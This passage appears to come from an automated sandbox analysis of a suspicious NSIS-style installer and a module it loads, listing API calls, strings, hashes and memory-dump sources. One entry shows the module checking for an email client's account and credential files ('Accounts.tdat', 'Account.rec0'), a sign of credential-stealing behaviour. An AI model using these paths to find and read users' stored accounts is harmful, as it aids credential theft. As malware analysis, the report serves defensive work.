• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
• Instruction ID: 2d9fb341b818c34885f35f6e6d755d1b55c6e7706bb7847a6dc6733995099f15
• Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
• Instruction Fuzzy Hash: 1A216F71500704ABCB219F68DE08A4BBBF8AF41714F048939EAD5F66A0C734E948CB64
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                    • API String ID: 0-537541572
                                                                                                                                                                                    • Opcode ID: 596eef90506494ca93f4a26a8f9d123d52c4259eee859677f1c293f1308d1ce2
                                                                                                                                                                                    • Instruction ID: 7da7255c3a1d1f5bc573a4e2720eb26af5fab6d76e1d9be8cfec6c9e3b7764bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 596eef90506494ca93f4a26a8f9d123d52c4259eee859677f1c293f1308d1ce2
                                                                                                                                                                                    • Instruction Fuzzy Hash: A711D876E05321ABFF118A698C84A1A375A9F00BB4FE00110F905FF180DBB0D941CEE0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(0042A050,00000000,?,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                                                                                                                                                                                    • lstrlenA.KERNEL32(004030DC,0042A050,00000000,?,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                                                                                                                                                                                    • lstrcatA.KERNEL32(0042A050,004030DC,004030DC,0042A050,00000000,?,761F23A0), ref: 004050E8
                                                                                                                                                                                    • SetWindowTextA.USER32(0042A050,0042A050), ref: 004050FA
                                                                                                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                                                                                                                                                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                                                                                                                                                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                                                                    • Opcode ID: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
                                                                                                                                                                                    • Instruction ID: 508789985144291932d060d6ef0b432b589b283746e8f0e3613f73f9cddaab2c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E217A71A00518BFDB119FA5CD85EDFBFA9EB05354F14807AF944AA290C6398A418F98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404972
                                                                                                                                                                                    • GetMessagePos.USER32 ref: 0040497A
                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404994
                                                                                                                                                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049A6
                                                                                                                                                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049CC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                                                    • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                                                                                                                    • Instruction ID: 403e93763916a0c69708d0661a5269b1e580af1e573dd698745729a1614bb606
                                                                                                                                                                                    • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 02015EB190021DBAEB01DBA4DD85BFFBBFCAF55711F10412BBA50B61C0C7B499018BA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C7C
                                                                                                                                                                                    • MulDiv.KERNEL32(?,00000064,?), ref: 00402CA7
                                                                                                                                                                                    • wsprintfA.USER32 ref: 00402CB7
                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402CC7
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • verifying installer: %d%%, xrefs: 00402CB1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                                                    • Opcode ID: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
                                                                                                                                                                                    • Instruction ID: 537944924eabc97b3cccf86cf440a0916c3cc685b10ad000e4021125f5d30dc2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3401FF7164020DFBEF209F61DD09EEE37A9AB04305F008039FA06A92D0DBB999558F59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062A6
                                                                                                                                                                                    • wsprintfA.USER32 ref: 004062DF
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004062F3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                                                    • API String ID: 2200240437-4240819195
                                                                                                                                                                                    • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                                                                                                                                    • Instruction ID: 90c405808a5079913e9fc86ee6967ca4c100a0af48b71fe7beb271d56a4ee20c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89F0F630510609AADB15AB64DD0DFEB365CAB08304F1405BEA686F11C1EA78E9398B99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,?,00000000,00000000,?,?,?,000000F0), ref: 0040278A
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004027E5
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004027F8
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,?,00000000,00000000,?,?,?,000000F0), ref: 00402824
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                                                                    • Opcode ID: 86959158328887a69436977c2353ec4d0a2939775019437a65a2cb7982052b7f
                                                                                                                                                                                    • Instruction ID: 6644526d81fa5c7ff175c86addd85cc92bc24fd3ec06af29a2511a4f4fc8a5d3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 86959158328887a69436977c2353ec4d0a2939775019437a65a2cb7982052b7f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B21BC71800124BBDF216FA5DE89D9E7B79EF04324F10423AF924762E0CA784D418FA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 367B1038
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 367B104B
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 367B1061
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 367B1075
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 367B1090
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 367B10B8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3594823470-0
                                                                                                                                                                                    • Opcode ID: 8cba604efcacce07f160cef315bb1353561013336751146b783b0992864888fc
                                                                                                                                                                                    • Instruction ID: e1f0efc7132ffc647a9dd882367a1b0904d60ff1393d165e1c700ffe503bed60
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cba604efcacce07f160cef315bb1353561013336751146b783b0992864888fc
                                                                                                                                                                                    • Instruction Fuzzy Hash: EF217176D1031C9BCF109A60DC4CDDF3B69EF44214F908296E95ADB1A1DB309A96CB51
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 367B1E89: lstrlenW.KERNEL32(?,?,?,?,?,367B10DF,?,?,?,00000000), ref: 367B1E9A
                                                                                                                                                                                      • Part of subcall function 367B1E89: lstrcatW.KERNEL32(?,?,?,367B10DF,?,?,?,00000000), ref: 367B1EAC
                                                                                                                                                                                      • Part of subcall function 367B1E89: lstrlenW.KERNEL32(?,?,367B10DF,?,?,?,00000000), ref: 367B1EB3
                                                                                                                                                                                      • Part of subcall function 367B1E89: lstrlenW.KERNEL32(?,?,367B10DF,?,?,?,00000000), ref: 367B1EC8
                                                                                                                                                                                      • Part of subcall function 367B1E89: lstrcatW.KERNEL32(?,367B10DF,?,367B10DF,?,?,?,00000000), ref: 367B1ED3
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 367B122A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                    • API String ID: 1475205934-1520055953
                                                                                                                                                                                    • Opcode ID: ca98fc0cf40848b1e33166bba44ea85f8309591ef693855d8991650c99bdb2d6
                                                                                                                                                                                    • Instruction ID: 180884d9e0e0456d3a7d8bb04d403181d6575f004f2aca67b60d8fa10882e086
                                                                                                                                                                                    • Opcode Fuzzy Hash: ca98fc0cf40848b1e33166bba44ea85f8309591ef693855d8991650c99bdb2d6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7121C379E10208AAEB109BA0EC85FED773AEF80714F800556F605EF2D0E7B15D818B59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,367B4AEA,?,?,367B4A8A,?,367C2238,0000000C,367B4BBD,00000000,00000000), ref: 367B4B59
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 367B4B6C
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,367B4AEA,?,?,367B4A8A,?,367C2238,0000000C,367B4BBD,00000000,00000000,00000001,367B2082), ref: 367B4B8F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                    • Opcode ID: 5fa6e425b2b58cba473a8ea292674dc8b52da0a0cd9a05bca23720230457d27e
                                                                                                                                                                                    • Instruction ID: c0072ebe8da016eafb80f09b23cbc2f1288a336ccab34a2c223cff4864157180
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fa6e425b2b58cba473a8ea292674dc8b52da0a0cd9a05bca23720230457d27e
                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF03C75910108EBDF119B91C808FAEBFBAEF04351F8041A8EA05EB154DB359942CAA1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,367B9C07,?,00000000,?,00000000,00000000), ref: 367B94D4
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 367B9590
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,367B9C07,00000000,?,?,?,?,?,?,?,?,?,367B9C07,?), ref: 367B95AF
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,367B9C07,00000000,?,?,?,?,?,?,?,?,?,367B9C07,?), ref: 367B95E8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 977765425-0
                                                                                                                                                                                    • Opcode ID: 2f70404235a74873e5f16b0c6b78efb6dedd54e7417514d0020d1f198aa70bdc
                                                                                                                                                                                    • Instruction ID: f6a83f91da2c2c9367ed50c76796e61672e2a6f0aadd42fd2f577a22ca124e37
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f70404235a74873e5f16b0c6b78efb6dedd54e7417514d0020d1f198aa70bdc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B51A5B5D042099FDF00CFA8C895BEEBBF9EF09310F54451AE565EB281E7309941CBA1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,00000000,0040A418,00435800,00000000,00000000,00000031), ref: 00401798
                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,0040A418,0040A418,00000000,00000000,0040A418,00435800,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                                                                      • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,0042EC00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                                                                                                                                                                                      • Part of subcall function 0040508C: lstrlenA.KERNEL32(0042A050,00000000,?,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                                                                                                                                                                                      • Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,0042A050,00000000,?,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                                                                                                                                                                                      • Part of subcall function 0040508C: lstrcatA.KERNEL32(0042A050,004030DC,004030DC,0042A050,00000000,?,761F23A0), ref: 004050E8
                                                                                                                                                                                      • Part of subcall function 0040508C: SetWindowTextA.USER32(0042A050,0042A050), ref: 004050FA
                                                                                                                                                                                      • Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                                                                                                                                                                                      • Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                                                                                                                                                                                      • Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1941528284-0
                                                                                                                                                                                    • Opcode ID: d5b44f832fdb25be28d2b543a9b61bfb24a32d76e5489e3aa463aebb2df8a026
                                                                                                                                                                                    • Instruction ID: 024705dcfdf044f05b4b82656432081f20986447a00b4521f0a60d415ab43704
                                                                                                                                                                                    • Opcode Fuzzy Hash: d5b44f832fdb25be28d2b543a9b61bfb24a32d76e5489e3aa463aebb2df8a026
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4841B431A04515BECB107BB58C45EAF3679EF05369F60833BF421F20E1D67C89428A6D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(?), ref: 00401D98
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                                                                                                                                                    • CreateFontIndirectA.GDI32(0040B820), ref: 00401E1A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3808545654-0
                                                                                                                                                                                    • Opcode ID: 308e053560ee70820e3614aee6e3ae82a2990e303a595f115dffdce8e5cbd147
                                                                                                                                                                                    • Instruction ID: e9269c0f41cd5a79e17a17131fa0488204b4df503fc5c3e11bd14e9e74a55962
                                                                                                                                                                                    • Opcode Fuzzy Hash: 308e053560ee70820e3614aee6e3ae82a2990e303a595f115dffdce8e5cbd147
                                                                                                                                                                                    • Instruction Fuzzy Hash: 24014072944344AEE7006BB4AE49BA97FE8EB15705F109439F141B61F2CB790405CF6D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,367B10DF,?,?,?,00000000), ref: 367B1E9A
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,367B10DF,?,?,?,00000000), ref: 367B1EAC
• lstrlenW.KERNEL32(?,?,367B10DF,?,?,?,00000000), ref: 367B1EB3
• lstrlenW.KERNEL32(?,?,367B10DF,?,?,?,00000000), ref: 367B1EC8
• lstrcatW.KERNEL32(?,367B10DF,?,367B10DF,?,?,?,00000000), ref: 367B1ED3
Memory Dump Source
• Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
• Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: lstrlen$lstrcat
• String ID:
• API String ID: 493641738-0
• Opcode ID: 23372c8776dc9531ab3f6293fd3e514858b780365402f38207b7c2b2ab7f912d
• Instruction ID: c2fd49f64b19f179a7bdf57f51b6bbe1057d9da3e988a5ae2fa78ff21beecb92
• Opcode Fuzzy Hash: 23372c8776dc9531ab3f6293fd3e514858b780365402f38207b7c2b2ab7f912d
• Instruction Fuzzy Hash: DBF08226511214BAD721272AAC85EBF7B7DEFC6B61F840019FA08D7190DB54584392B6
APIs
• GetDlgItem.USER32(?), ref: 00401D3F
• GetClientRect.USER32(00000000,?), ref: 00401D4C
• LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
• SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
• DeleteObject.GDI32(00000000), ref: 00401D8A
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: f9fa1cd0c3501304c50b62854bfb403a78d5a342419f16e3e75aa469d0047489
• Instruction ID: b94dd0b2fc2efe961c915ac3dbaedcbaa59703da1128c811c259d0727350af9e
• Opcode Fuzzy Hash: f9fa1cd0c3501304c50b62854bfb403a78d5a342419f16e3e75aa469d0047489
• Instruction Fuzzy Hash: 6EF0FFB2600515BFDB00EBA4DE88DAFB7BCEB44301B04447AF645F2191CA748D018B38
APIs
• lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,?), ref: 004048EB
• wsprintfA.USER32 ref: 004048F3
• SetDlgItemTextA.USER32(?,0042A870), ref: 00404906
Strings
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: fc360b60deb29158253d5225dc841659dab03716f0da90b14001ba2338fc6a71
• Instruction ID: 46e1028d5dd9cf3fa3a12b124fa319e283dc00677a7b855ac62dacd231200cde
• Opcode Fuzzy Hash: fc360b60deb29158253d5225dc841659dab03716f0da90b14001ba2338fc6a71
• Instruction Fuzzy Hash: 8D11E477A041282BEB0075699C41EBF3298DB82374F24463BFE65F21D1E979CC1246E9
APIs
• SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
• SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
Strings
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
• Instruction ID: bdc01a124477b6dd133b62af0939e03034df0dda3ad70936a50ebcebbcd9d6cc
• Opcode Fuzzy Hash: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
• Instruction Fuzzy Hash: 9F218F71A44209BEEB15DFA5D946AED7BB0EB84304F14803EF505F61D1DA7889408F28
APIs
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,367B190E,?,?,00000000,?,00000000), ref: 367B1643
